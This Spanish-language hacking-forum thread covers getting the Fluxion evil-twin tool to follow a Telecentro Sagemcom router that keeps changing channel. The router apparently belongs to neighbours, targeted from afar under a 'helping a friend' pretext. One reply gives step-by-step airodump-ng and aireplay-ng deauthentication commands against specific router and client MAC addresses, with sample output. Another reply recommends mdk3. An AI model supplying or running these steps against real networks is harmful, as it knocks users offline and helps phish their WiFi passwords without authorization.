27 de Abril de 2018, 03:14:52 am
  • WPSdb - Base de Datos de Pines Online

Autor Tema: Modem Sagemcom de telecentro cambia de canal en fluxion  (Leído 420 veces)

Desconectado ferdinando789

  • Usuario
  • *
  • Mensajes: 8
  • Reputación: +0/-0
  • Usuario
  • awards Usuario Registrado
    • Awards
Modem Sagemcom de telecentro cambia de canal en fluxion
« en: 07 de Enero de 2018, 03:31:05 pm »
Siempre me cambia de canal. Es obvio que solo usa siempre 3 canales , el 1, el 6 y el 11 gralmente es asi.
Alguno tiene o sabe alguna solución para evitar este problema.
Es para ayudar a una amiga en un depto que son todos telecentro.
Slds y gracias .

Aclaro que tengo una antena Kasens(chipset 3070) y lo apunto desde lejos....Igual habría que supuestamente ir al depto y usar dos notebooks mas....
Si saben una tecnica de un fluxion que varie el canal cuando lo cambie el router, me avisan.
« Última modificación: 07 de Enero de 2018, 03:32:52 pm por ferdinando789 »
  • Antenas: Nisuta Ralink 3070
  • Sistemas Operativos: windows 7
  • Sistemas Operativos que utilizo para Auditar: wifislax
  • Dispositivos Inalambricos: placa wifi nisuta

Desconectado superhache

  • Usuario
  • *
  • Mensajes: 8
  • Reputación: +9/-8
  • Usuario
  • awards Usuario Registrado
    • Awards
Re:Modem Sagemcom de telecentro cambia de canal en fluxion
« Respuesta #1 en: 07 de Enero de 2018, 07:17:50 pm »
Siempre me cambia de canal. Es obvio que solo usa siempre 3 canales , el 1, el 6 y el 11 gralmente es asi.
Alguno tiene o sabe alguna solución para evitar este problema.
Es para ayudar a una amiga en un depto que son todos telecentro.
Slds y gracias .

Aclaro que tengo una antena Kasens(chipset 3070) y lo apunto desde lejos....Igual habría que supuestamente ir al depto y usar dos notebooks mas....
Si saben una tecnica de un fluxion que varie el canal cuando lo cambie el router, me avisan.

Hola, me encontré con ese problema y siempre hablando del fluxion,
cuando este levanta el servidor http,
cerras la ventanita de deautenticación abajo a la derecha letras rojas,
y entonces haces la deautenticación a mano con las herramientas del aircrack.

Mientras el falso AP sigue en su canal, (no importa que no sea el mismo canal que el del sagemcom) te abris una nueva terminal para usar el airodump-ng y ver en que canal está tu sagemcom,
una vez q sabes en que canal está, volvelo a correr con opciones -a y -c nrocanal,
luego por cada cliente conectado te abris mas terminales y en ella corres la linea para deautenticar aireplay-ng -0 1000 -a macap -c maccliente ... etc para deautenticar a cada cliente.

se entiende?
saludos
PD
mon0 es el nombre de la interfaz q creq el fluxion para usar con el aircrack

  • Antenas: NISUTA 9DBI
  • Sistemas Operativos: WINDOWS 10
  • Sistemas Operativos que utilizo para Auditar: KALI 2.0
  • Dispositivos Inalambricos: NISUTA WIU150N51W

Desconectado leandrocondurso

  • Usuario
  • *
  • Mensajes: 4
  • Reputación: +0/-6
  • Night hawk
  • awards Usuario Registrado
    • Awards
Re:Modem Sagemcom de telecentro cambia de canal en fluxion
« Respuesta #2 en: 10 de Febrero de 2018, 02:13:17 pm »
Tenes un ejemplo más claro de como desautentificar  a los clientes, xq no logro que me salga
  • Antenas: tp link y nisuta
  • Sistemas Operativos: Windows
  • Sistemas Operativos que utilizo para Auditar: wifislax
  • Dispositivos Inalambricos: nisuta 30dbi

Desconectado superhache

  • Usuario
  • *
  • Mensajes: 8
  • Reputación: +9/-8
  • Usuario
  • awards Usuario Registrado
    • Awards
Re:Modem Sagemcom de telecentro cambia de canal en fluxion
« Respuesta #3 en: 11 de Febrero de 2018, 05:07:19 pm »
Tenes un ejemplo más claro de como desautentificar  a los clientes, xq no logro que me salga
Pero no es dificil,
has usado las herramientas del aircrack antes? no has capturado un handshake? en youtube estan bien explicados, per9
o de todos modos es algo así

1) cuando fluxion haya levantado su falso AP, te abres una nueva terminal y ves en que canal está ahora.

Código: [Seleccionar]
airodump-ng -a --bssid=48:83:C7:B4:13:E2  mon0  --ignore-negative-one
te da algo como
Código: [Seleccionar]
 CH  9 ][ Elapsed: 0 s ][ 2018-02-11 14:15                                         
                                                                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                             
 48:83:C7:B4:13:E2  -56        3        8    3   1  54e  WPA2 CCMP   PSK  Telecentro-57fa                                   
                                                                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                   
                                                                                                                             
 48:83:C7:B4:13:E2  5C:DC:96:34:B7:A8  -64    0 -24      0        1                                                           
 48:83:C7:B4:13:E2  18:A6:F7:27:C3:FD   -1    0e- 0      0        5                                                           
 48:83:C7:B4:13:E2  44:6E:E5:F6:C4:0B  -46    0e- 0e     0        4 .


2) vemos que esta en canal 1  y repetis el comando anteriro agregando el canal.
Código: [Seleccionar]
airodump-ng -a -c 1 --bssid=48:83:C7:B4:13:E2  mon0  --ignore-negative-one

3) también vas a ver los clientes conectados , en este caso hay 3 , así que abres 3 nuevas terminales y en cada una de ellas pones,.
Código: [Seleccionar]
aireplay-ng -0 6  -a 48:83:C7:B4:13:E2  -c 44:6E:E5:F6:C4:0B  mon0 --ignore-negative-one

si funciona veras algo como
Código: [Seleccionar]
14:17:18  Waiting for beacon frame (BSSID: 48:83:C7:B4:13:E2) on channel -1
14:17:19  Sending 64 directed DeAuth. STMAC: [44:6E:E5:F6:C4:0B] [ 0|57 ACKs]
14:17:19  Sending 64 directed DeAuth. STMAC: [44:6E:E5:F6:C4:0B] [ 0|61 ACKs]
14:17:20  Sending 64 directed DeAuth. STMAC: [44:6E:E5:F6:C4:0B] [ 0|56 ACKs]
14:17:21  Sending 64 directed DeAuth. STMAC: [44:6E:E5:F6:C4:0B] [ 7|60 ACKs]
14:17:21  Sending 64 directed DeAuth. STMAC: [44:6E:E5:F6:C4:0B] [ 0|55 ACKs]
14:17:22  Sending 64 directed DeAuth. STMAC: [44:6E:E5:F6:C4:0B] [ 0|59 ACKs]

root@kali:~#

donde 6 es el nro de veces que vas a repetir la operación , aqui puedes usar cualquier nro y si pones un 0 es infinito, repite segun tantos clientes tengas, chekea cada tanto si cambia de canal,  y repite los pasos.

es un proecso manual y presencial , lo tienes q ir monitoreando,
espero q te sirva,
saludos.
  • Antenas: NISUTA 9DBI
  • Sistemas Operativos: WINDOWS 10
  • Sistemas Operativos que utilizo para Auditar: KALI 2.0
  • Dispositivos Inalambricos: NISUTA WIU150N51W

Desconectado badder

  • Usuario
  • *
  • Mensajes: 69
  • Reputación: +2/-18
  • Bl4st3r
  • awards Usuario Registrado
    • Awards
Re:Modem Sagemcom de telecentro cambia de canal en fluxion
« Respuesta #4 en: 11 de Febrero de 2018, 08:19:35 pm »
Tenes un ejemplo más claro de como desautentificar  a los clientes, xq no logro que me salga
Usá mdk3
  • Antenas: generic
  • Sistemas Operativos: Windows 10 | WifiSlax 4.12 | Kali 2017.2
  • Sistemas Operativos que utilizo para Auditar: WifiSlax | Kali 2017.2
  • Dispositivos Inalambricos: RTL8187 | Ralink3070
No way out!